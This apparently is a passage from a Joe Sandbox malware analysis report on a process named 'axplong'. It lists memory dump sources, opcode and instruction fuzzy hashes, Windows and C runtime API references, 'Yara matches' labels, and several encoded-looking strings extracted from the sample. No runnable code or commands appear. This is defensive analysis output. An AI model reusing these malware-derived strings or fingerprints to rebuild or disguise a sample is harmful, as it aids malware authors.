                                                                    • Instruction ID: 0e5aeaf2bd129985d5549054ead49baeb522937fc1402e2bc3dbc83aa6f1cf8d
                                                                    • Opcode Fuzzy Hash: 471269d726843af832985ff3f0d58a99226276adbb6d8ecbeaf485e95b53414f
                                                                    • Instruction Fuzzy Hash: 7901A1AB13C114ADB150D6523F6CAFBA76EE9C5B30331852BF607C1947D2E51A591231
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.3391611597.00000000052F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 052F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_52f0000_axplong.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 3ecb4607fce0ec014f381b08ab9ade64a34bb4d608bb53cbf1f4e70f88ffba0f
                                                                    • Instruction ID: aa6f762347d3f755778ea68b3ae308a6e2cfdfa27682eb93f706274b1103a4e0
                                                                    • Opcode Fuzzy Hash: 3ecb4607fce0ec014f381b08ab9ade64a34bb4d608bb53cbf1f4e70f88ffba0f
                                                                    • Instruction Fuzzy Hash: 8201A9AB13C114ED6150D5413F6CEFAA72EE9C6B30331892AFA03C4503D3E91A591231
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.3391611597.00000000052F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 052F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_52f0000_axplong.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: adeb7ded3b4fcf5d033a33662cb8aaba9e93228fa6bcfbd190bf57b9ecacd572
                                                                    • Instruction ID: 36a0a471fca2615feb9142353aefb10c1b32b9c37addc39bedee6eb70a6cb3b9
                                                                    • Opcode Fuzzy Hash: adeb7ded3b4fcf5d033a33662cb8aaba9e93228fa6bcfbd190bf57b9ecacd572
                                                                    • Instruction Fuzzy Hash: B901A1AA13C110BCB150DA523F689FBA72EE9D5B30330892BF143C1443D3E51A591231
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.3391611597.00000000052F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 052F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_52f0000_axplong.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: decf6e74ad51aaff3d4cc6c069a1409e9b19adeedb3c1c12e517d63c512b62cb
                                                                    • Instruction ID: 970b3f76975820b313bc9cf49aa84673d3abf31aff6b35fa887380b67d534f84
                                                                    • Opcode Fuzzy Hash: decf6e74ad51aaff3d4cc6c069a1409e9b19adeedb3c1c12e517d63c512b62cb
                                                                    • Instruction Fuzzy Hash: 5501D2BB13D244ADB210D2557F6CAFAAB6EDAC6730331886BF503C2443D3990A5D4231
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.3391611597.00000000052F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 052F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_52f0000_axplong.jbxd
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.3387924782.00000000008F1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008F0000, based on PE: true
                                                                    • Associated: 00000006.00000002.3387897532.00000000008F0000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000006.00000002.3387924782.0000000000952000.00000040.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000006.00000002.3388039573.0000000000959000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000006.00000002.3388069389.000000000095B000.00000040.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000006.00000002.3388069389.0000000000AF0000.00000040.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000006.00000002.3388069389.0000000000BCC000.00000040.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000006.00000002.3388069389.0000000000BF9000.00000040.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000006.00000002.3388069389.0000000000C03000.00000040.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000006.00000002.3388069389.0000000000C13000.00000040.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000006.00000002.3388467481.0000000000C14000.00000080.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000006.00000002.3388812602.0000000000DB6000.00000040.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000006.00000002.3388852687.0000000000DB8000.00000080.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_8f0000_axplong.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: #$111$246122658369$GqKudSO2$MJB+$MT==$UD==$WGt=$WWp=$WWt=$fed3aa
                                                                    • API String ID: 0-214772295
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.3387924782.00000000008F1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008F0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_8f0000_axplong.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: __floor_pentium4
                                                                    • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                    • API String ID: 4168288129-2761157908
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.3387924782.00000000008F1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008F0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_8f0000_axplong.jbxd
                                                                    Yara matches
                                                                    APIs
                                                                    • GetSystemTimePreciseAsFileTime.KERNEL32(?,0090CE82,?,?,?,?,0090CEB7,?,?,?,?,?,?,0090C42D,?,00000001), ref: 0090CB33
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.3387924782.00000000008F1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008F0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_8f0000_axplong.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Time$FilePreciseSystem
                                                                    • String ID:
                                                                    • API String ID: 1802150274-0
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.3387924782.00000000008F1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008F0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_8f0000_axplong.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 0
                                                                    • API String ID: 0-4108050209
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.3387924782.00000000008F1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008F0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_8f0000_axplong.jbxd
                                                                    Yara matches
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.3387924782.00000000008F1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008F0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_8f0000_axplong.jbxd
                                                                    Yara matches
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.3387924782.00000000008F1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008F0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_8f0000_axplong.jbxd
                                                                    Yara matches
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.3387924782.00000000008F1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008F0000, based on PE: true
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.3391611597.00000000052F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 052F0000, based on PE: false
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.3387924782.00000000008F1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008F0000, based on PE: true
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.3387924782.00000000008F1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008F0000, based on PE: true
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.3387924782.00000000008F1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008F0000, based on PE: true
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.3387924782.00000000008F1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008F0000, based on PE: true
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.3387924782.00000000008F1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008F0000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 246122658369$8KG0fymoFx==$Fz==$HBhr$WGt=$invalid stoi argument$stoi argument out of range
                                                                    • API String ID: 0-2390467879
                                                                    APIs
                                                                    • _ValidateLocalCookies.LIBCMT ref: 009247A7
                                                                    • ___except_validate_context_record.LIBVCRUNTIME ref: 009247AF
                                                                    • _ValidateLocalCookies.LIBCMT ref: 00924838
                                                                    • __IsNonwritableInCurrentImage.LIBCMT ref: 00924863
                                                                    • _ValidateLocalCookies.LIBCMT ref: 009248B8
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.3387924782.00000000008F1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008F0000, based on PE: true
                                                                    Similarity
                                                                    • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                    • String ID: csm
                                                                    • API String ID: 1170836740-1018135373
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.3387924782.00000000008F1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008F0000, based on PE: true
                                                                    Similarity
                                                                    • API ID: _wcsrchr
                                                                    • String ID: .bat$.cmd$.com$.exe
                                                                    • API String ID: 1752292252-4019086052
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.3387924782.00000000008F1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008F0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_8f0000_axplong.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Mtx_unlock$Cnd_broadcast
                                                                    • String ID:
                                                                    • API String ID: 32384418-0
                                                                    • Opcode ID: 21a350a3f35c9f98bcbda7a935874fd8c4d00baec0c3a17fafb18e8ff1a8146f
                                                                    • Instruction ID: 7e93902344701eadad237b9995b39bae533fdf900b1d8f7b2ed0a85764698957
                                                                    • Opcode Fuzzy Hash: 21a350a3f35c9f98bcbda7a935874fd8c4d00baec0c3a17fafb18e8ff1a8146f
                                                                    • Instruction Fuzzy Hash: 82A1E0B0A0170A9FDB21DF74C844BAAB7F8FF55314F14822AE915D7281EB31EA04CB91
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.3387924782.00000000008F1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008F0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_8f0000_axplong.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: _strrchr
                                                                    • String ID:
                                                                    • API String ID: 3213747228-0
                                                                    • Opcode ID: 7941c91dc3c81985f55d5af0d0e5d35b4c2fcc41726f6f06d2574da038ee3747
                                                                    • Instruction ID: 366af7cefd98687957400b87ee55d9c47e3829abc21eee9016022b0ee7c5b167
                                                                    • Opcode Fuzzy Hash: 7941c91dc3c81985f55d5af0d0e5d35b4c2fcc41726f6f06d2574da038ee3747
                                                                    • Instruction Fuzzy Hash: FDB17DB29002A59FDB11CF28D8417FEBBF9EF95340F14856AE885EB349D6389D41CB60
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.3387924782.00000000008F1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008F0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_8f0000_axplong.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Xtime_diff_to_millis2_xtime_get
                                                                    • String ID:
                                                                    • API String ID: 531285432-0
                                                                    • Opcode ID: 906348bae2102637fc151600c74ae2edff3753bb92f0c3caf7db54993a881ed5
                                                                    • Instruction ID: 4a46cba881295599b4d0d7becae79430385da980b66b39dcd3227be1449db55a
                                                                    • Opcode Fuzzy Hash: 906348bae2102637fc151600c74ae2edff3753bb92f0c3caf7db54993a881ed5
                                                                    • Instruction Fuzzy Hash: 582151B5A052099FDF10EFA4DC45ABEBBB8EF49710F000165FA01B72D1DB70AD019BA1